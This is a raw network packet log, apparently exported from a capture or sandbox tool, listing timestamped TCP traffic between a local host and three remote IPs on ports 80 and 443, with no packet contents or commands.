Aug 10, 2024 16:12:23.948751926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948761940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.948786974 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.948817015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948826075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948837996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948851109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948878050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.948889017 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.948901892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948911905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948921919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.948960066 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949018955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949034929 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.949034929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949048042 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.949085951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949173927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.949173927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.949181080 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.949229002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.949340105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949351072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949361086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949373007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949383020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949409962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949419022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949501991 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949529886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949539900 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949551105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949563980 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949577093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949584007 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949600935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949608088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949618101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949625015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949632883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949641943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949651003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949659109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949672937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949678898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949691057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949702978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949733973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949758053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949774981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949789047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949800014 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949806929 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949821949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949835062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949840069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949848890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949861050 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949868917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949877024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949884892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949902058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949923992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.949969053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949980974 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949990034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.949997902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950006962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950015068 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950023890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950033903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950041056 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950050116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950067043 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950076103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950088024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950093985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950103998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950114965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950120926 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950130939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950153112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950208902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950277090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950287104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950294971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950303078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950315952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950320959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950330019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950335979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950344086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950361967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950380087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950387001 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950409889 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950488091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950499058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950509071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950519085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950530052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950551033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950567961 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950581074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950591087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950602055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950617075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950622082 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950632095 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950640917 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950649023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950655937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950670004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950695038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950719118 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950738907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950748920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950756073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950763941 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950774908 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950784922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950792074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950800896 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950809002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950818062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950828075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950834036 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950843096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950853109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950860977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950870037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.950877905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.950897932 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951301098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951312065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951322079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951354980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951366901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951389074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951400042 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951409101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951427937 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951431990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951450109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951472998 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951525927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951535940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951545954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951556921 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951566935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951575041 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951585054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951592922 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951601982 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951612949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951634884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951859951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951870918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951881886 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.951905012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951922894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.951934099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952002048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952012062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952023029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952039957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952045918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952064037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952089071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952111006 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952121973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952132940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952142954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952152967 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952161074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952172995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:23.952178955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952195883 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.952213049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:23.973718882 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.973745108 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.973809958 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.973850965 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.973879099 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.973897934 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.995634079 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.995649099 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.995707035 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.995707035 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.995712042 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:23.995748997 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:23.999660969 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.999685049 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.999731064 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.999752998 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:23.999775887 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:23.999799013 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.000524998 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.000546932 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.000586033 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.000586033 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.000611067 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.000633955 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.000716925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000727892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000739098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000751019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000761986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000770092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.000780106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.000782013 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.000788927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000797033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.000806093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.000821114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.000844002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.001091957 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001113892 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001166105 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.001180887 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001204014 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.001241922 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.001849890 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001871109 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001933098 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.001966953 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.001988888 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.002012014 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.004614115 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.004635096 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.004667044 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.004678011 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.004704952 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.004724979 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.005672932 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005693913 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005758047 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.005775928 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005867958 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005893946 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005928040 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.005945921 CEST	443	49752	87.240.132.78	192.168.2.4
Aug 10, 2024 16:12:24.005969048 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.006352901 CEST	49752	443	192.168.2.4	87.240.132.78
Aug 10, 2024 16:12:24.031032085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031043053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031054974 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031065941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031078100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031089067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031101942 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031191111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031191111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031191111 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031192064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031202078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031213999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031224012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031234026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031244993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031255007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031272888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031285048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031285048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031285048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031285048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031296968 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031359911 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031464100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031476021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031505108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031516075 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031527996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031538963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031548977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031560898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031574011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031574011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031574011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031574011 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031594992 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031599998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031610966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031622887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031708956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031708956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031708956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031845093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031856060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031864882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031877041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031887054 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031898022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031907082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031919003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031929970 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031935930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031935930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031935930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031935930 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031939983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031951904 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031961918 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031972885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031976938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031976938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031976938 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.031982899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.031996012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032006979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032015085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032015085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032016993 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032102108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032102108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032102108 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032387972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032398939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032408953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032419920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032443047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.032458067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032458067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032489061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.032568932 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.032584906 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.032630920 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.032635927 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.032654047 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.032690048 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.033005953 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.033020020 CEST	443	49754	162.159.130.233	192.168.2.4
